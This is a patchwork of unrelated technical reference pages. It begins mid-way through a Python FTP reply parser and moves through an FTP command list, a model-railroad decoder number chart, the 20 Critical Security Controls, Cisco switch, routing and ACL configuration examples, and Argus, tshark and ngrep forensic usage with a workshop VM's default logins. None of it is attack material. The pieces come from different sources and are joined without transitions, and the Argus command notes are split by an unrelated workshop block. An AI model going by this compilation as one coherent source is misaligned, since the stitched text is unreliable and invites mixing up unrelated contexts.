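            return None
        return (".".join(map(str, h[:4])), h[4] * 256 + h[5])
    if code == 229:
        m = EPSV_RE.search(text)
        if not m:
            return None
        port = int(m.group(1))
        return (None, port) if 0 < port <= 65535 else None
    return None


def decode_transcript(raw: str) -> List[dict]:
    """Every reply with its code, class, text lines and announced endpoint."""
    out = []
    for code, lines in split_replies(raw):
        out.append({
            "code": code,
            "class": REPLY_CLASS.get(str(code)[0], "unknown"),
            "lines": lines,
            "endpoint": passive_endpoint(code, lines[-1]),
        })
    return out


if __name__ == "__main__":
    for reply in decode_transcript(SAMPLE_TRANSCRIPT):
        print(reply)
```

A firewall helper that trusts the 227 host field should compare it with the control connection's peer address before opening anything; the parser above only validates the octet range, and the policy decision of whether a differing host is acceptable belongs to the caller.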


List of raw FTP commands

(Warning: this is a technical document, not necessary for most FTP use.)

Note that commands marked with a * are not implemented in a number of FTP servers.

Common commands

ABOR - abort a file transfer

CWD - change working directory

DELE - delete a remote file

LIST - list remote files

MDTM - return the modification time of a file

MKD - make a remote directory

NLST - name list of remote directory

PASS - send password

PASV - enter passive mode

PORT - open a data port

PWD - print working directory

QUIT - terminate the connection

RETR - retrieve a remote file

RMD - remove a remote directory

RNFR - rename from

RNTO - rename to

SITE - site-specific commands

SIZE - return the size of a file

STOR - store a file on the remote host

TYPE - set transfer type

USER - send username

Less common commands

ACCT* - send account information

APPE - append to a remote file

CDUP - CWD to the parent of the current directory

HELP - return help on using the server

MODE - set transfer mode

NOOP - do nothing

REIN* - reinitialize the connection

STAT - return server status

STOU - store a file uniquely

STRU - set file transfer structure

SYST - return system type


Decimal-Binary-Hexadecimal Conversion Chart

This chart shows all of the combinations of decimal, binary and hexadecimal from 0 to 255 decimal. When making a change in a CV this chart will show the conversion for different numbering systems. Some decoders split the CV into two parts. When you modify a CV you need to write back all 8 bits. This chart will help determine the correct bit value for a CV.

Decimal Binary Hex | Decimal Binary Hex | Decimal Binary Hex | Decimal Binary Hex

Bit No. > 76543210 76543210 76543210 76543210

0 00000000 0 64 01000000 40 128 10000000 80 192 11000000 C0

1 00000001 1 65 01000001 41 129 10000001 81 193 11000001 C1

2 00000010 2 66 01000010 42 130 10000010 82 194 11000010 C2

3 00000011 3 67 01000011 43 131 10000011 83 195 11000011 C3

4 00000100 4 68 01000100 44 132 10000100 84 196 11000100 C4

5 00000101 5 69 01000101 45 133 10000101 85 197 11000101 C5

6 00000110 6 70 01000110 46 134 10000110 86 198 11000110 C6

7 00000111 7 71 01000111 47 135 10000111 87 199 11000111 C7

8 00001000 8 72 01001000 48 136 10001000 88 200 11001000 C8

9 00001001 9 73 01001001 49 137 10001001 89 201 11001001 C9

10 00001010 A 74 01001010 4A 138 10001010 8A 202 11001010 CA

11 00001011 B 75 01001011 4B 139 10001011 8B 203 11001011 CB

12 00001100 C 76 01001100 4C 140 10001100 8C 204 11001100 CC

13 00001101 D 77 01001101 4D 141 10001101 8D 205 11001101 CD

14 00001110 E 78 01001110 4E 142 10001110 8E 206 11001110 CE

15 00001111 F 79 01001111 4F 143 10001111 8F 207 11001111 CF

16 00010000 10 80 01010000 50 144 10010000 90 208 11010000 D0

17 00010001 11 81 01010001 51 145 10010001 91 209 11010001 D1

18 00010010 12 82 01010010 52 146 10010010 92 210 11010010 D2

19 00010011 13 83 01010011 53 147 10010011 93 211 11010011 D3

20 00010100 14 84 01010100 54 148 10010100 94 212 11010100 D4

21 00010101 15 85 01010101 55 149 10010101 95 213 11010101 D5

22 00010110 16 86 01010110 56 150 10010110 96 214 11010110 D6

23 00010111 17 87 01010111 57 151 10010111 97 215 11010111 D7

24 00011000 18 88 01011000 58 152 10011000 98 216 11011000 D8

25 00011001 19 89 01011001 59 153 10011001 99 217 11011001 D9

26 00011010 1A 90 01011010 5A 154 10011010 9A 218 11011010 DA

27 00011011 1B 91 01011011 5B 155 10011011 9B 219 11011011 DB

28 00011100 1C 92 01011100 5C 156 10011100 9C 220 11011100 DC

29 00011101 1D 93 01011101 5D 157 10011101 9D 221 11011101 DD

30 00011110 1E 94 01011110 5E 158 10011110 9E 222 11011110 DE

31 00011111 1F 95 01011111 5F 159 10011111 9F 223 11011111 DF

32 00100000 20 96 01100000 60 160 10100000 A0 224 11100000 E0

33 00100001 21 97 01100001 61 161 10100001 A1 225 11100001 E1

34 00100010 22 98 01100010 62 162 10100010 A2 226 11100010 E2

35 00100011 23 99 01100011 63 163 10100011 A3 227 11100011 E3

36 00100100 24 100 01100100 64 164 10100100 A4 228 11100100 E4

37 00100101 25 101 01100101 65 165 10100101 A5 229 11100101 E5

38 00100110 26 102 01100110 66 166 10100110 A6 230 11100110 E6

39 00100111 27 103 01100111 67 167 10100111 A7 231 11100111 E7

40 00101000 28 104 01101000 68 168 10101000 A8 232 11101000 E8

41 00101001 29 105 01101001 69 169 10101001 A9 233 11101001 E9

42 00101010 2A 106 01101010 6A 170 10101010 AA 234 11101010 EA

43 00101011 2B 107 01101011 6B 171 10101011 AB 235 11101011 EB

44 00101100 2C 108 01101100 6C 172 10101100 AC 236 11101100 EC

45 00101101 2D 109 01101101 6D 173 10101101 AD 237 11101101 ED

46 00101110 2E 110 01101110 6E 174 10101110 AE 238 11101110 EE

47 00101111 2F 111 01101111 6F 175 10101111 AF 239 11101111 EF

48 00110000 30 112 01110000 70 176 10110000 B0 240 11110000 F0

49 00110001 31 113 01110001 71 177 10110001 B1 241 11110001 F1

50 00110010 32 114 01110010 72 178 10110010 B2 242 11110010 F2

51 00110011 33 115 01110011 73 179 10110011 B3 243 11110011 F3

52 00110100 34 116 01110100 74 180 10110100 B4 244 11110100 F4

53 00110101 35 117 01110101 75 181 10110101 B5 245 11110101 F5

54 00110110 36 118 01110110 76 182 10110110 B6 246 11110110 F6

55 00110111 37 119 01110111 77 183 10110111 B7 247 11110111 F7

56 00111000 38 120 01111000 78 184 10111000 B8 248 11111000 F8

57 00111001 39 121 01111001 79 185 10111001 B9 249 11111001 F9

58 00111010 3A 122 01111010 7A 186 10111010 BA 250 11111010 FA

59 00111011 3B 123 01111011 7B 187 10111011 BB 251 11111011 FB

60 00111100 3C 124 01111100 7C 188 10111100 BC 252 11111100 FC

61 00111101 3D 125 01111101 7D 189 10111101 BD 253 11111101 FD

62 00111110 3E 126 01111110 7E 190 10111110 BE 254 11111110 FE

63 00111111 3F 127 01111111 7F 191 10111111 BF 255 11111111 FF

Binary Number System for one byte

Bit Number | 7   | 6  | 5  | 4  | 3 | 2 | 1 | 0 |
Bit Weight | 128 | 64 | 32 | 16 | 8 | 4 | 2 | 1 |

Some Commonly used CVs

CV-1 Short Address        CV-6 Mid Point Voltage
CV-2 Start Voltage        CV-7 Ver Number
CV-3 Acceleration Rate    CV-8 Maker ID
CV-4 Deceleration Rate    CV-17/18 Long Address
CV-5 Maximum Voltage      CV-19 Consist Address
CV-21 Advance Consist function control
CV-22 Advance Consist headlight control
CV-23 Advance Consist acceleration rate
CV-24 Advance Consist deceleration rate

SEE YOUR DECODER MANUAL FOR ALL OF THE CVs IT USES AND THE RANGE OF VALUES.

CV-29 Configuration Register
Bit 0 = Direction of travel
Bit 1 = Speed step 28
Bit 2 = d.c. enable
Bit 3 = Advance acknowledgment
Bit 4 = Alternate speed table
Bit 5 = Long address

CV-66 Forward Trim
CV-67 to 94 Speed Table
CV-95 Reverse Trim

DEF 24April02


The 20 Critical Controls

1 - Inventory of Authorised and Unauthorised Devices
Actively manage (inventory, track, and correct) all hardware devices on the network so that only authorized devices are given access, and unauthorized and unmanaged devices are found and prevented from gaining access.

2 - Inventory of Authorised and Unauthorised Software
Actively manage (inventory, track, and correct) all software on the network so that only authorized software is installed and can execute, and that unauthorized and unmanaged software is found and prevented from installation or execution.

3 - Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations and Servers
Establish, implement, and actively manage (track, report on, correct) the security configuration of laptops, servers, and workstations using a rigorous configuration management and change control process in order to prevent attackers from exploiting vulnerable services and settings.

4 - Continuous Vulnerability Assessment and Remediation
Continuously acquire, assess, and take action on new information in order to identify vulnerabilities, remediate, and minimize the window of opportunity for attackers.

5 - Malware Defences
Control the installation, spread, and execution of malicious code at multiple points in the enterprise, while optimizing the use of automation to enable rapid updating of defense, data gathering, and corrective action.

6 - Application Software Security
Manage the security lifecycle of all in-house developed and acquired software in order to prevent, detect, and correct security weaknesses.

7 - Wireless Access Control
The processes and tools used to track/control/prevent/correct the secure use of wireless local area networks (LANs), access points, and wireless client systems.

8 - Data Recovery Capability
The processes and tools used to properly back up critical information with a proven methodology for timely recovery of it.

9 - Security Skills Assessment and Appropriate Training to Fill Gaps
For all functional roles in the organization (prioritizing those mission-critical to the business and its security), identify the specific knowledge, skills, and abilities needed to support defense of the enterprise; develop and execute an integrated plan to assess, identify gaps, and remediate through policy, organizational planning, training, and awareness programs.

10 - Secure Configurations for Network Devices such as Firewalls, Routers and Switches
Establish, implement, and actively manage (track, report on, correct) the security configuration of network infrastructure devices using a rigorous configuration management and change control process in order to prevent attackers from exploiting vulnerable services and settings.


11 - Limitation and Control of Network Ports, Protocols and Services
Manage (track/control/correct) the ongoing operational use of ports, protocols, and services on networked devices in order to minimize windows of vulnerability available to attackers.

12 - Controlled Use of Administrative Privileges
The processes and tools used to track/control/prevent/correct the use, assignment, and configuration of administrative privileges on computers, networks, and applications.

13 - Boundary Defence
Detect/prevent/correct the flow of information transferring networks of different trust levels with a focus on security-damaging data.

14 - Maintenance, Monitoring and Analysis of Audit Logs
Collect, manage, and analyze audit logs of events that could help detect, understand, or recover from an attack.

15 - Control Access Based on the Need to Know
The processes and tools used to track/control/prevent/correct secure access to critical assets (e.g., information, resources, and systems) according to the formal determination of which persons, computers, and applications have a need and right to access these critical assets based on an approved classification.

16 - Account Monitoring and Control
Actively manage the life-cycle of system and application accounts - their creation, use, dormancy, deletion - in order to minimize opportunities for attackers to leverage them.

17 - Data Protection
The processes and tools used to prevent data exfiltration, mitigate the effects of exfiltrated data, and ensure the privacy and integrity of sensitive information.

18 - Incident Response and Management
Protect the organization's information, as well as its reputation, by developing and implementing an incident response infrastructure (e.g., plans, defined roles, training, communications, management oversight) for quickly discovering an attack and then effectively containing the damage, eradicating the attacker's presence, and restoring the integrity of the network and systems.

19 - Secure Network Engineering
Make security an inherent attribute of the enterprise by specifying, designing, and building-in features that allow high confidence systems operations while denying or minimizing opportunities for attackers.

20 - Penetration Tests and Red Team Exercises
Test the overall strength of an organization's defenses (the technology, the processes, and the people) by simulating the objectives and actions of an attacker.


Cisco Networking All-in-One To create and configure a Cisco network, you need to know about routers and switches to develop and manage secure Cisco systems. Become acquainted with Cisco network devices and code listings; and find out how to manage static routing and view routing information.

OSI Model for Cisco Networking

While you may not use the OSI model every day, you should be familiar with it, specifically when working with Cisco switches and routers (which operate at Layer 2 and Layer 3, respectively). Here are some of the items that operate at each level of the OSI model:

Layer | Description | Examples
7. Application | Responsible for initiating or servicing the request. | SMTP, DNS, HTTP, and Telnet
6. Presentation | Formats the information so that it is understood by the receiving system. | Compression and encryption depending on the implementation
5. Session | Responsible for establishing, managing, and terminating the session. | NetBIOS
4. Transport | Breaks information into segments and is responsible for connection and connectionless communication. | TCP and UDP
3. Network | Responsible for logical addressing and routing. | IP, ICMP, ARP, RIP, IGRP, and routers
2. Data Link | Responsible for physical addressing, error correction, and preparing the information for the media. | MAC address, CSMA/CD, switches, and bridges
1. Physical | Deals with the electrical signal. | Cables, connectors, hubs, and repeaters

How to Configure a Cisco Network

Like all networks, a Cisco network needs to be properly configured. To do so, you need to know the configuration modes to use when configuring your network. You also should know how to configure an interface, configure a switch management interface, and configure an interface to use DHCP for your Cisco network.

Configuration modes for Cisco networking

When moving around in the Cisco IOS, you will see many prompts. These prompts change as you move from one configuration mode to another. Here is a summary of the major configuration modes:

User EXEC mode: When you connect to a Cisco device the default configuration mode is user exec mode. With user exec mode you can view the settings on the device but not make any changes. You know you are in User EXEC mode because the IOS prompt displays a ">".

Privileged EXEC mode: In order to make changes to the device you must navigate to Privileged EXEC mode where you may be required to input a password. Privileged EXEC mode displays with a "#" in the prompt.

Global Configuration mode: Global Configuration mode is where you go to make global changes to the router such as the hostname. To navigate to Global Configuration mode from Privileged EXEC mode you type "configure terminal" or "conf t" where you will be placed at the "(config)#" prompt.

Sub Prompts: There are a number of different sub prompts from Global Configuration mode you can navigate to, such as the interface prompts to modify settings on a specific interface, or the line prompts to modify the different ports on the device.

Configure an interface for Cisco networking

When working with routers in particular, but also when dealing with the management interface on switches, you will often need to configure network interfaces, which will either match physical interface ports or virtual interfaces in the form of a virtual LAN (VLAN) interface (when dealing with switches).

For your router interfaces the following example will set speed, duplex and IP configuration information for the interface FastEthernet 0/0 (notice the interface reference as slot/port). In the case of the router, the interface is enabled using the no shutdown command in the final step; interfaces on switches are enabled by default.

Router1>enable
Router1#configure terminal
Router1(config)#interface FastEthernet0/0
Router1(config-if)#description Private LAN
Router1(config-if)#speed 100
Router1(config-if)#duplex full
Router1(config-if)#ip address 192.168.1.1 255.255.255.0
Router1(config-if)#no shutdown

Configure a switch management interface for Cisco networking

For your switches, to enable an IP address on your management interface, you will use something similar to this example. In this example, management is being performed over VLAN 1 - the default VLAN.

Switch1>enable
Switch1#configure terminal
Switch1(config)#interface VLAN 1
Switch1(config-if)#ip address 192.168.1.241 255.255.255.0

Configure an interface to use DHCP for Cisco networking

If you want to configure either a router or switch to retrieve its IP configuration information from a network Dynamic Host Configuration Protocol (DHCP) server, then you can use commands like the following example.

Router1>enable
Router1#configure terminal
Router1(config)#interface FastEthernet0/0
Router1(config-if)#ip address dhcp

Creating a VLAN for Cisco Networking

When working with your Cisco network, you may want to separate users into different broadcast domains for security or traffic reduction. You can do this by implementing VLANs. The following example will create VLAN (VLAN2) and place the ports on a switch (from 1-12) into VLAN2.

Switch1>enable
Switch1#configure terminal
Switch1(config)#interface vlan 2
Switch1(config-if)#description Finance VLAN
Switch1(config-if)#exit
Switch1(config)#interface range FastEthernet 0/1 - 12
Switch1(config-if-range)#switchport mode access
Switch1(config-if-range)#switchport access vlan 2


If you are connecting two switches together, then you will want to allow all configured VLANs to pass between the two switches. This is accomplished by implementing a trunk port. To configure port 24 on your switch to be a trunk port, you will use the following code:

Switch1>enable
Switch1#configure terminal
Switch1(config)#interface FastEthernet 0/24
Switch1(config-if)#switchport mode trunk

Using EtherChannel for Cisco Networking

Don't be afraid to use EtherChannel on your Cisco network. EtherChannel allows you to take up to eight network ports on your switch and treat them as a single larger link. This can be used to connect servers with multiple network cards that are bonded (or teamed) to a switch, or to connect multiple switches together. There are two main negotiation protocols, Port Aggregation Protocol (PAgP) which is a proprietary Cisco protocol and Link Aggregation Control Protocol (LACP) which is an open standards protocol.

To set EtherChannel to use one of these protocols, you configure it to support one of the following modes.

auto: Sets the interface to respond to PAgP negotiation packets, but the interface will not start negotiations on its own.

desirable: Sets the interface to actively attempt to negotiate a PAgP connection.

on: Forces the connection to bring all links up without using a protocol to negotiate connections. This mode can only connect to another device that is also set to on. When using this mode, the switch does not negotiate the link using either PAgP or LACP.

active: Sets the interface to actively attempt to negotiate connections with other LACP devices.

passive: Sets the interface to respond to LACP data if it receives negotiation requests from other systems.

The following example will configure EtherChannel to group ports 11 and 12 on the switch together using PAgP as the protocol. The same type of command would be used on the switch to which Switch1 is connected.

Switch1> enable
Switch1# configure terminal
Switch1(config)# interface range FastEthernet0/11 -12
Switch1(config-if-range)# switchport mode access
Switch1(config-if-range)# switchport access vlan 10
Switch1(config-if-range)# channel-group 5 mode desirable

Working with Spanning Tree Protocol for Cisco Networking

Spanning Tree Protocol (STP) enables you to create redundant loops on your Cisco network for fault tolerance, and prevents inadvertent loops that may be created on your network from bringing the network to its knees.

The following code will enable the Cisco proprietary Rapid Per VLAN Spanning Tree Protocol (Rapid PVST) rather than the open-standard Multiple Spanning Tree Protocol (MSTP). In addition to configuring STP on the switch, you will also configure port 2 on the switch for portfast, which allows the port to immediately transition to forwarding mode.

Switch1> enable
Switch1# configure terminal
Switch1(config)#spanning-tree mode rapid-pvst
Switch1(config)#interface FastEthernet 0/2
Switch1(config-if)#spanning-tree portfast
%Warning: portfast should only be enabled on ports connected to a single host. Connecting hubs, concentrators, switches, bridges, etc... to this interface when portfast is enabled, can cause temporary bridging loops. Use with CAUTION
%Portfast will be configured in 10 interfaces due to the range command but will only have effect when the interfaces are in a non-trunking mode.

Managing Static Routing for Cisco Networking

When working with your routers on your Cisco network, it's very likely that you'll want to have your routers route data. The first step in having your router pass data from one interface to another interface is to enable routing; just use these commands.

Router1>enable
Router1#configure terminal
Router1(config)#ip routing

Whether or not you choose to use a dynamic routing protocol, you may add static routes to your router. The following will add a static route to Router1 to send data to the 192.168.5.0/24 network using the router with the IP address of 192.168.3.2.

Router1>enable
Router1#configure terminal
Router1(config)#ip routing
Router1(config)#ip route 192.168.5.0 255.255.255.0 192.168.3.2

Managing routing information protocol for Cisco networking

Routing Information Protocol (RIP) is widely used, with version 2 allowing you to use Variable Length Subnet Masks (VLSM) across your network. The following code will enable routing, enable RIP, set RIP to version 2, disable route summarization, define the network distributed from this router as 192.168.5.0/24, and, rather than broadcasting routes, send RIP data directly to 192.168.1.1.

Router2>enable
Router2#configure terminal
Router2(config)#ip routing
Router2(config)#router rip
Router2(config-router)#version 2
Router2(config-router)#no auto-summary
Router2(config-router)#network 192.168.5.0
Router2(config-router)#neighbor 192.168.1.1

Managing enhanced interior gateway routing protocol for Cisco networking

Enhanced Interior Gateway Routing Protocol (EIGRP) is the updated version of IGRP. The following code will enable EIGRP using an autonomous-system (AS) number of 100, distribute two networks, and disable auto-summary.

Router2>enable
Router2#configure terminal
Router2(config)#ip routing
Router2(config)#router eigrp 100
Router2(config-router)#network 192.168.1.0
Router2(config-router)#network 192.168.5.0
Router2(config-router)#no auto-summary

Managing open shortest path first for Cisco networking

Open Shortest Path First (OSPF) is a widely used link-state protocol. OSPF uses the address of the loopback interface as the OSPF router identifier, so this example will set the address of the loopback interface, then enable OSPF with a process ID of 100, distributing the network 192.168.255.254 and the network 192.168.5.0/24.

Router2>enable
Router2#configure terminal
Router2(config)#interface loopback 0
Router2(config-if)#ip address 192.168.255.254 255.255.255.0
Router2(config-if)#exit
Router2(config)#router ospf 100
Router2(config-router)#network 192.168.255.254 0.0.0.0 area 0
Router2(config-router)#network 192.168.5.0 0.0.0.255 area 0

Viewing Routing Information for Cisco Networking

After setting up any routing protocol that you want to implement - RIP, OSPF, or EIGRP - you can view all of your routing information through the show ip route command. The following is an example of the output of this command. The output includes a legend showing the codes for each routing protocol, and the specific routes are identified by the source protocol.

Router2>enable
Password:
Router2#show ip route
Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is not set

D    192.168.10.0/24 [90/284160] via 192.168.1.1, 00:04:19, FastEthernet0/0
O    192.168.10.0/24 [110/11] via 192.168.1.1, 00:01:01, FastEthernet0/0
R    192.168.10.0/24 [120/1] via 192.168.1.1, 00:00:07, FastEthernet0/0
C    192.168.5.0/24 is directly connected, FastEthernet0/1
C    192.168.1.0/24 is directly connected, FastEthernet0/0
S    192.168.3.0/24 [1/0] via 192.168.1.1

Securing a Cisco Network

Security is always a concern, and your Cisco network needs to be properly secured. In the following sections, you see how to secure your Cisco network by configuring NAT, by configuring an ACL, and by applying that ACL.

Securing your Cisco network by configuring NAT

The following commands are used to configure NAT overload services on a router called Router1. In this example, a list of source addresses is created in access list #1, which is then used as the inside source list. The FastEthernet 0/0 port is the overloaded public address port that all inside addresses get translated to.

Router1>enable
Router1#configure terminal
Router1(config)#access-list 1 permit 10.0.0.0 0.255.255.255
Router1(config)#ip nat inside source list 1 interface FastEthernet 0/0 overload
Router1(config)#interface FastEthernet0/0
Router1(config-if)#ip nat outside
Router1(config-if)#interface FastEthernet0/1
Router1(config-if)#ip nat inside

Securing your Cisco network by configuring an access control list (ACL)

ACLs are used to control traffic flow. They can be used to allow or deny the flow of traffic. The two main types of ACLs are:

Standard ACLs, which have fewer options for classifying data and controlling traffic flow than Extended ACLs. They are only able to manage traffic based on the source IP address. These ACLs are numbered from 1–99 and from 1300–1999.

Extended ACLs, which offer the ability to filter or control traffic based on a variety of criteria such as source or destination IP addresses, as well as protocol type such as, ICMP, TCP, UDP, or IP. These ACLs are numbered from 100–199 and from 2000–2699.

To create a standard ACL, you can use the following example which will create an ACL that allows traffic for the 192.168.8.0/24 network.

Switch1>enable
Switch1#configure terminal
Switch1(config)#access-list 50 permit 192.168.8.0 0.0.0.255

To create an extended ACL, you can use the following example, which will create an ACL that allows traffic with source addresses in the 192.168.8.0/24 network and a TCP destination port of either 80 (HTTP) or 443 (HTTPS):

Router1>enable
Router1#configure terminal
Router1(config)#access-list 101 remark This ACL is to control the outbound router traffic.
Router1(config)#access-list 101 permit tcp 192.168.8.0 0.0.0.255 any eq 80
Router1(config)#access-list 101 permit tcp 192.168.8.0 0.0.0.255 any eq 443

Securing your Cisco network by applying an access control list

After you have created an Access Control List (ACL), such as ACL 101 created above, you can apply that ACL to an interface. In the following example, this ACL is applied to restrict outbound traffic on FastEthernet0/1.

Router1>enable
Router1#configure terminal
Router1(config)#interface FastEthernet0/1
Router1(config-if)#ip access-group 101 out

PORT SECURITY

Switch>enable

Password: cisco

Switch#show running-config

Switch#configure terminal

Switch(config)#interface fa0/12

Switch(config-if)#switchport mode access

Switch(config-if)#switchport port-security

Switch(config-if)#switchport port-security maximum 2

Switch(config-if)#switchport port-security violation shutdown

Switch(config-if)#no shutdown

Switch(config-if)#end

Switch#show port-security interface fa0/12

Switch#copy running-config startup-config

Cisco Access Control Lists: Standard ACL: 1 – 99 and 1300 – 1999

Use a remark to describe the ACL (Optional):

R1(config)# access-list 1 remark ACL TO DENY ACCESS FROM SALES VLAN

Create the ACL, keeping the following in mind:

o ACL uses first-match logic.

o There is an implicit deny any at the end of the ACL.

R1(config)# access-list 2 deny 192.168.1.77
R1(config)# access-list 2 deny 192.168.1.64 0.0.0.31
R1(config)# access-list 2 permit 10.1.0.0 0.0.255.255
R1(config)# access-list 2 deny 10.0.0.0 0.255.255.255
R1(config)# access-list 2 permit any

Enable the ACL on the chosen router interface in the correct direction (in or out):

R1(config-if)# ip access-group 2 out

Using standard ACL to limit telnet and SSH access to a router: Create the ACL that defines the permitted telnet clients:

R1(config)# access-list 99 remark ALLOWED TELNET CLIENTS
R1(config)# access-list 99 permit 192.168.1.128 0.0.0.15

Apply the ACL inbound on the vty lines:

R1(config)# line vty 0 4
R1(config-line)# access-class 99 in
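The first-match and implicit-deny rules above, worked through in Python against ACL 2 and the vty ACL 99 exactly as entered on this page (an added example, not code from the page; the prompt stripping and the `evaluate` return shape are this example's own choices):

```python
"""First-match evaluation of Cisco standard ACLs with wildcard masks (added example)."""
import ipaddress


def _ip(text):
    return int(ipaddress.IPv4Address(text))


def parse_standard_acl(cli_lines):
    """Turn 'access-list N permit|deny <addr> [wildcard]' lines into (action, addr, wildcard).

    Remarks are skipped, a leading 'R1(config)# ' prompt is tolerated, a bare address means
    wildcard 0.0.0.0, 'host X' is the same, and 'any' is 0.0.0.0 with wildcard 255.255.255.255.
    """
    entries = []
    for line in cli_lines:
        parts = line.split("#", 1)[-1].split()
        if len(parts) < 4 or parts[0] != "access-list" or parts[2] == "remark":
            continue
        action, target = parts[2], parts[3]
        if target == "any":
            addr, wild = 0, 0xFFFFFFFF
        elif target == "host":
            addr, wild = _ip(parts[4]), 0
        else:
            addr = _ip(target)
            wild = _ip(parts[4]) if len(parts) > 4 else 0
        entries.append((action, addr, wild))
    return entries


def evaluate(entries, src_ip):
    """Return (decision, index of the matching entry).

    A wildcard bit of 1 means "don't care", so only the bits where the wildcard is 0 are
    compared. The first entry that matches wins; if none matches, the implicit deny at the
    end of every ACL applies and the index is None.
    """
    ip = _ip(src_ip)
    for i, (action, addr, wild) in enumerate(entries):
        care = ~wild & 0xFFFFFFFF
        if (ip & care) == (addr & care):
            return action, i
    return "deny", None


# ACL 2 and ACL 99 as entered on the page (constructed input for this example).
ACL2 = parse_standard_acl([
    "R1(config)# access-list 2 remark ACL TO DENY ACCESS FROM SALES VLAN",
    "R1(config)# access-list 2 deny 192.168.1.77",
    "R1(config)# access-list 2 deny 192.168.1.64 0.0.0.31",
    "R1(config)# access-list 2 permit 10.1.0.0 0.0.255.255",
    "R1(config)# access-list 2 deny 10.0.0.0 0.255.255.255",
    "R1(config)# access-list 2 permit any",
])
ACL99 = parse_standard_acl([
    "R1(config)# access-list 99 remark ALLOWED TELNET CLIENTS",
    "R1(config)# access-list 99 permit 192.168.1.128 0.0.0.15",
])

if __name__ == "__main__":
    for src in ("192.168.1.77", "192.168.1.90", "192.168.1.96", "10.1.200.3", "10.7.0.1"):
        print(f"ACL 2  {src:15} -> {evaluate(ACL2, src)}")
    # 192.168.1.150 falls outside 192.168.1.128-143 and hits the implicit deny.
    for src in ("192.168.1.130", "192.168.1.150"):
        print(f"ACL 99 {src:15} -> {evaluate(ACL99, src)}")
```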

Extended ACL: 100 – 199 and 2000 – 2699

Extended ACL should be placed as close as possible to the source of the packet.

Extended ACL matches packets based on source and destination IP addresses, protocol, source and destination port numbers, and other criteria as well.

R1(config)# access-list 101 remark MY_ACCESS_LIST
R1(config)# access-list 101 deny ip host 10.1.1.1 host 10.2.2.2
R1(config)# access-list 101 deny tcp 10.1.1.0 0.0.0.255 any eq 23
R1(config)# access-list 101 deny icmp 10.1.1.1 0.0.0.0 any
R1(config)# access-list 101 deny tcp host 10.1.1.0 host 10.0.0.1 eq 80
R1(config)# access-list 101 deny udp host 10.1.1.7 eq 53 any
R1(config)# access-list 101 permit ip any any
R1(config)# interface fastEthernet 0/0
R1(config-if)# ip access-group 101 in

Named ACL:

Named ACLs use names to identify ACLs rather than numbers, and commands that permit or deny traffic are written in a sub mode called named ACL mode (nacl).

Named ACL enables the editing of the ACL (deleting or inserting statements) by sequencing statements of the ACL.

Named standard ACL:

R1(config)# ip access-list standard MY_STANDARD_ACL
R1(config-std-nacl)# permit 10.1.1.0 0.0.0.255
R1(config-std-nacl)# deny 10.2.2.2
R1(config-std-nacl)# permit any
R1(config-std-nacl)# exit
R1(config)# interface fastEthernet 0/1
R1(config-if)# ip access-group MY_STANDARD_ACL out

Named extended ACL:

R1(config)# ip access-list extended MY_EXTENDED_ACL
R1(config-ext-nacl)# deny icmp 10.1.1.1 0.0.0.0 any
R1(config-ext-nacl)# deny tcp host 10.1.1.0 host 10.0.0.1 eq 80
R1(config-ext-nacl)# permit ip any any
R1(config-ext-nacl)# exit
R1(config)# interface fastEthernet 0/1
R1(config-if)# ip access-group MY_EXTENDED_ACL in

Editing ACL using sequence numbers:

R1(config)# ip access-list extended MY_EXTENDED_ACL
R1(config-ext-nacl)# no 20            ! Deletes the statement with sequence number 20
R1(config)# ip access-list standard 99
R1(config-std-nacl)# 5 deny 1.1.1.1   ! Inserts a statement with sequence number 5


== ARGUS ==

ra [options] [-- filter-expression]

-n
Suppress port number to service conversion.

-r [- | <file file ...>]
Read data from <files> in the order presented on the command line. '-' denotes stdin (default).

-R <dir dir ...>
Recursively descend the directory and process all the regular files that are encountered.

-w <file>
Append matching data to <file>, in argus file format. An output-file of '-' directs ra to write the argus(5) records to stdout, allowing for "chaining" ra* style commands together.

racluster [-m aggregation-objects] [options] [-- filter-expression]

Supported aggregation-objects are:

saddr/[l|m]
source IP addr/[cidr len | m.a.s.k].

daddr/[l|m]
destination IP addr/[cidr len | m.a.s.k].

proto
transaction protocol.

sport
source port number. Implies use of 'proto'.

dport
destination port number. Implies use of 'proto'.

(tshark examples)

Generate a HOSTS file (like /etc/hosts) based on DNS lookups in a PCAP file:

tshark -r dump.pcap -q -z hosts > hosts.txt

Print Protocol Hierarchy Statistics (PHS) listing for all traffic in dump.pcap:

tshark -r dump.pcap -q -z io,phs

== NGREP ==

ngrep <-iqvx> <-IO pcap_dump> <-n num> <match expression> <bpf filter>

-i
Ignore case for the regex expression.

-q
Be quiet; don't output any information other than packet headers and their payloads (if relevant).

-v
Invert the match; only display packets that don't match.

-x
Dump packet contents as hexadecimal as well as ASCII.

-I pcap_dump
Input pcap file pcap_dump into ngrep.

-O pcap_dump
Output matched packets to a pcap file.

-n num
Match only num packets total, then exit.

match expression
A match expression is an extended regular expression.

bpf filter
Selects a filter that specifies what packets will be dumped.

EXAMPLES

Search a PCAP file for packets containing the email address "[email protected]":

ngrep -I dump.pcap -q [email protected]

Search for DNS requests (to port 53) for "pwned.se":

ngrep -I snort.log.1428364808 -q -i pwned.se dst port 53

Hands-on Network Forensics Workshop Cheat Sheet
www.forsvarsmakten.se

Unzip the VirtualBox machine from Hands-on_Network_Forensics.zip on your USB thumb drive to your local hard drive

Start VirtualBox and run the Security Onion VM

Usernames/Passwords

Security Onion VM: user / password

ELSA : https://127.0.0.1/elsa/ : user / password

Squert : https://127.0.0.1/squert/ : user / password

Snorby : https://127.0.0.1:444/ : [email protected] / password

Xplico : https://127.0.0.1:9876/ : xplico / xplico

Paths

PCAP files: /nsm/sensor_data/securityonion_eth1/dailylogs/

Argus files: /nsm/sensor_data/securityonion_eth1/argus/

Bro-IDS logs: /nsm/bro/logs/

ip_whitelist.py: /usr/local/bin/ip_whitelist.py


rasort [-m sort-fields] [options] [-- filter-expression]

Supported sort-fields are:

stime
record start time <default>

dur
record total duration.

saddr[/cidr]
source IP addr, with optional cidr specification for IPv4 addresses.

daddr[/cidr]
